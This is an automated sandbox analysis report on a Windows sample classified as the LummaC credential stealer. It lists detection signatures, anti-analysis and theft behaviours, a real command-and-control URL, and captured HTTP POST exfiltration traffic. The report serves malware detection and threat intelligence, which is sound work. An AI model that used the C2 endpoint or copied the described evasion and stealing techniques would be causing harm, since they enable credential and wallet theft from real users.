Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1562133
MD5:5032eea68452ff054956add942d03697
SHA1:dc28bb50951074ec5d823e4bc94ba520796cc88f
SHA256:940581abda4098f8858edda4080cff127a179db5c7ac9d6f357881569b703fdb
Tags:exeuser-Bitsight
Infos:

Detection

LummaC Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Detected potential crypto function
Entry point lies outside standard sections
Found inlined nop instructions (likely shell or obfuscated code)
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 7660 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 5032EEA68452FF054956ADD942D03697)
  • cleanup

Malware Configuration

Threatname: LummaC

{"C2 url": "https://frogs-severz.sbs/api", "Build Version": "LOGS11--LiveTraffi"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    Process Memory Space: file.exe PID: 7660JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
      Process Memory Space: file.exe PID: 7660JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        Process Memory Space: file.exe PID: 7660JoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security

          Sigma Signatures

          No Sigma rule has matched

          Suricata Signatures

          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-25T08:44:18.805230+010020283713Unknown Traffic192.168.2.949722104.21.88.250443TCP
          2024-11-25T08:44:20.760278+010020283713Unknown Traffic192.168.2.949728104.21.88.250443TCP
          2024-11-25T08:44:23.017010+010020283713Unknown Traffic192.168.2.949734104.21.88.250443TCP
          2024-11-25T08:44:25.390045+010020283713Unknown Traffic192.168.2.949740104.21.88.250443TCP
          2024-11-25T08:44:28.079334+010020283713Unknown Traffic192.168.2.949746104.21.88.250443TCP
          2024-11-25T08:44:30.698245+010020283713Unknown Traffic192.168.2.949756104.21.88.250443TCP
          2024-11-25T08:44:33.207388+010020283713Unknown Traffic192.168.2.949765104.21.88.250443TCP
          2024-11-25T08:44:37.037756+010020283713Unknown Traffic192.168.2.949776104.21.88.250443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-25T08:44:19.488836+010020546531A Network Trojan was detected192.168.2.949722104.21.88.250443TCP
          2024-11-25T08:44:21.447383+010020546531A Network Trojan was detected192.168.2.949728104.21.88.250443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-25T08:44:19.488836+010020498361A Network Trojan was detected192.168.2.949722104.21.88.250443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-25T08:44:21.447383+010020498121A Network Trojan was detected192.168.2.949728104.21.88.250443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-25T08:44:31.413842+010020480941Malware Command and Control Activity Detected192.168.2.949756104.21.88.250443TCP

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Antivirus / Scanner detection for submitted sample
          Source: file.exeAvira: detected
          Antivirus detection for URL or domain
          Source: https://frogs-severz.sbs/apialAvira URL Cloud: Label: malware
          Source: https://frogs-severz.sbs/api=Avira URL Cloud: Label: malware
          Source: https://frogs-severz.sbs/apizAvira URL Cloud: Label: malware
          Source: https://frogs-severz.sbs/4RAvira URL Cloud: Label: malware
          Source: https://frogs-severz.sbs/apisiAvira URL Cloud: Label: malware
          Source: https://frogs-severz.sbs:443/apiAvira URL Cloud: Label: malware
          Source: https://frogs-severz.sbs/apigAvira URL Cloud: Label: malware
          Source: https://frogs-severz.sbs/api)Avira URL Cloud: Label: malware
          Source: https://frogs-severz.sbs/TRAvira URL Cloud: Label: malware
          Source: https://frogs-severz.sbs/apiiAvira URL Cloud: Label: malware
          Source: https://frogs-severz.sbs/apiXAvira URL Cloud: Label: malware
          Source: https://frogs-severz.sbs/apiaAvira URL Cloud: Label: malware
          Found malware configuration
          Source: file.exe.7660.0.memstrminMalware Configuration Extractor: LummaC {"C2 url": "https://frogs-severz.sbs/api", "Build Version": "LOGS11--LiveTraffi"}
          AI detected suspicious sample
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
          Machine Learning detection for sample
          Source: file.exeJoe Sandbox ML: detected
          Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: unknownHTTPS traffic detected: 104.21.88.250:443 -> 192.168.2.9:49722 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.88.250:443 -> 192.168.2.9:49728 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.88.250:443 -> 192.168.2.9:49734 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.88.250:443 -> 192.168.2.9:49740 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.88.250:443 -> 192.168.2.9:49746 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.88.250:443 -> 192.168.2.9:49756 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.88.250:443 -> 192.168.2.9:49765 version: TLS 1.2
          Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+14h]0_2_003A98F0
          Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov edx, eax0_2_003DB8E0
          Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov edx, ecx0_2_003DB8E0
          Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx eax, byte ptr [esp+esi+000001E8h]0_2_003AE0D8
          Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-65h]0_2_003AE35B
          Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov edx, ecx0_2_003ABC9D
          Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov byte ptr [eax], bl0_2_003ACF05
          Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov ecx, eax0_2_003AC02B
          Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov byte ptr [ebx], al0_2_003C0870
          Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then push eax0_2_003DB860
          Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 98D5A07Fh0_2_003DC040
          Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], C18BC4BAh0_2_003DC040
          Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 6DBC3610h0_2_003DC040
          Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 98D5A07Fh0_2_003DC040
          Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then push eax0_2_003DF8D0
          Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov edi, eax0_2_003DF8D0
          Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edi, byte ptr [esp+edx+14h]0_2_003AE970
          Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [esi], cx0_2_003AEA38
          Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov byte ptr [esi], cl0_2_003C8CB0
          Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, ebp0_2_003A5C90
          Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, ebp0_2_003A5C90
          Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 4C697C35h0_2_003DBCE0
          Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edx, byte ptr [eax+ecx]0_2_003AAD00
          Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edx, byte ptr [edi]0_2_003C5E90
          Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-58FA0F6Ch]0_2_003E0F60
          Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edx, byte ptr [eax+ecx+00008F12h]0_2_003A77D0
          Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [ebp+ebx*4+00h], ax0_2_003A77D0

          Networking

          barindex
          Suricata IDS alerts for network traffic
          Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.9:49728 -> 104.21.88.250:443
          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.9:49728 -> 104.21.88.250:443
          Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.9:49756 -> 104.21.88.250:443
          Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.9:49722 -> 104.21.88.250:443
          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.9:49722 -> 104.21.88.250:443
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractorURLs: https://frogs-severz.sbs/api
          Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49740 -> 104.21.88.250:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49756 -> 104.21.88.250:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49734 -> 104.21.88.250:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49728 -> 104.21.88.250:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49776 -> 104.21.88.250:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49765 -> 104.21.88.250:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49746 -> 104.21.88.250:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49722 -> 104.21.88.250:443
          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: frogs-severz.sbs
          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 53Host: frogs-severz.sbs
          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=A5K45MZSF13LUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12815Host: frogs-severz.sbs
          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=P14SZ2J0R2C1792User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15051Host: frogs-severz.sbs
          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=A8CHGFSQ06VHXG923TUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20585Host: frogs-severz.sbs
          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=03GZDEUNUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1162Host: frogs-severz.sbs
          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=DH8RDUB2KBUNUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 551295Host: frogs-severz.sbs
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global trafficDNS traffic detected: DNS query: property-imper.sbs
          Source: global trafficDNS traffic detected: DNS query: frogs-severz.sbs
          Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: frogs-severz.sbs
          Source: file.exe, 00000000.00000003.1497341173.00000000056E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
          Source: file.exe, 00000000.00000003.1497341173.00000000056E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
          Source: file.exe, 00000000.00000003.1497341173.00000000056E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
          Source: file.exe, 00000000.00000003.1497341173.00000000056E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
          Source: file.exe, 00000000.00000003.1497341173.00000000056E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
          Source: file.exe, 00000000.00000003.1497341173.00000000056E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
          Source: file.exe, 00000000.00000003.1497341173.00000000056E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
          Source: file.exe, 00000000.00000003.1497341173.00000000056E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
          Source: file.exe, 00000000.00000003.1497341173.00000000056E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
          Source: file.exe, 00000000.00000003.1497341173.00000000056E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
          Source: file.exe, 00000000.00000003.1497341173.00000000056E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
          Source: file.exe, 00000000.00000003.1448114148.0000000005679000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1448280145.0000000005676000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1448206732.0000000005676000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
          Source: file.exe, 00000000.00000003.1499442298.000000000109B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696495411400900000.2&ci=1696495411208.
          Source: file.exe, 00000000.00000003.1545525829.0000000001092000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1545581901.0000000001096000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1524856660.0000000001096000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1524775025.000000000108C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1546302886.0000000001092000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1546336555.0000000001096000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696495411400900000.1&ci=1696495411208.12791&cta
          Source: file.exe, 00000000.00000003.1448114148.0000000005679000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1448280145.0000000005676000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1448206732.0000000005676000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
          Source: file.exe, 00000000.00000003.1448114148.0000000005679000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1448280145.0000000005676000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1448206732.0000000005676000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
          Source: file.exe, 00000000.00000003.1448114148.0000000005679000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1448280145.0000000005676000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1448206732.0000000005676000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
          Source: file.exe, 00000000.00000003.1499442298.000000000109B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
          Source: file.exe, 00000000.00000003.1545525829.0000000001092000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1602899683.0000000001099000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1545581901.0000000001096000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1600188579.0000000001099000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1524856660.0000000001096000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1524775025.000000000108C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1546302886.0000000001092000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1546336555.0000000001096000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_b
          Source: file.exe, 00000000.00000003.1448114148.0000000005679000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1448280145.0000000005676000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1448206732.0000000005676000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
          Source: file.exe, 00000000.00000003.1448114148.0000000005679000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1448280145.0000000005676000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1448206732.0000000005676000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
          Source: file.exe, 00000000.00000003.1448114148.0000000005679000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1448280145.0000000005676000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1448206732.0000000005676000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
          Source: file.exe, 00000000.00000003.1600305728.0000000001077000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://frogs-severz.sbs/
          Source: file.exe, 00000000.00000002.1602899683.0000000001078000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1600305728.0000000001077000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://frogs-severz.sbs/4R
          Source: file.exe, 00000000.00000002.1602899683.0000000001078000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://frogs-severz.sbs/TR
          Source: file.exe, file.exe, 00000000.00000003.1497468228.000000000109B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1600086581.0000000001091000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1545638694.0000000001081000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1524819084.0000000001085000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1551144110.00000000056CD000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1604459516.00000000056D3000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1600343002.00000000056D2000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1545660464.0000000001085000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1600238733.0000000001085000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1600086581.000000000107F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1600238733.0000000001091000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1524792305.000000000107D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1524775025.000000000108C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1447764366.000000000107D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1602899683.0000000001086000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1496386073.000000000109C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1499442298.000000000109B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://frogs-severz.sbs/api
          Source: file.exe, 00000000.00000003.1545638694.0000000001081000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1545660464.0000000001085000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://frogs-severz.sbs/api)
          Source: file.exe, 00000000.00000002.1602899683.0000000001086000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://frogs-severz.sbs/api=
          Source: file.exe, 00000000.00000003.1600238733.0000000001085000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1600086581.000000000107F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1602899683.0000000001086000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://frogs-severz.sbs/apiX
          Source: file.exe, 00000000.00000003.1545525829.0000000001092000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://frogs-severz.sbs/apia
          Source: file.exe, 00000000.00000003.1545525829.0000000001092000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1600086581.0000000001091000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1602899683.0000000001091000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1600238733.0000000001091000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1546302886.0000000001092000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://frogs-severz.sbs/apial
          Source: file.exe, 00000000.00000003.1545638694.0000000001081000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1545660464.0000000001085000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://frogs-severz.sbs/apig
          Source: file.exe, 00000000.00000002.1602996314.000000000109D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://frogs-severz.sbs/apii
          Source: file.exe, 00000000.00000003.1545581901.000000000109C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://frogs-severz.sbs/apisi
          Source: file.exe, 00000000.00000002.1602899683.0000000001086000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://frogs-severz.sbs/apiz
          Source: file.exe, 00000000.00000003.1524775025.000000000108C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://frogs-severz.sbs:443/api
          Source: file.exe, 00000000.00000003.1499442298.000000000109B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqd4plX4pbW1CbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
          Source: file.exe, 00000000.00000003.1498963197.0000000005766000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
          Source: file.exe, 00000000.00000003.1498963197.0000000005766000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
          Source: file.exe, 00000000.00000003.1545525829.0000000001092000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1545581901.0000000001096000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1524856660.0000000001096000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1524775025.000000000108C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1546302886.0000000001092000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1546336555.0000000001096000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_e149f5d53c9263616797a13067f7a114fa287709b159d0a5
          Source: file.exe, 00000000.00000003.1448114148.0000000005679000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1448280145.0000000005676000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1448206732.0000000005676000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
          Source: file.exe, 00000000.00000003.1448114148.0000000005679000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1448280145.0000000005676000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1448206732.0000000005676000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
          Source: file.exe, 00000000.00000003.1499442298.000000000109B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
          Source: file.exe, 00000000.00000003.1498963197.0000000005766000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.HCe2hc5EPKfq
          Source: file.exe, 00000000.00000003.1498963197.0000000005766000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.oX6J3D7V9Efv
          Source: file.exe, 00000000.00000003.1498963197.0000000005766000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
          Source: file.exe, 00000000.00000003.1498963197.0000000005766000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
          Source: file.exe, 00000000.00000003.1498963197.0000000005766000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
          Source: file.exe, 00000000.00000003.1498963197.0000000005766000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
          Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
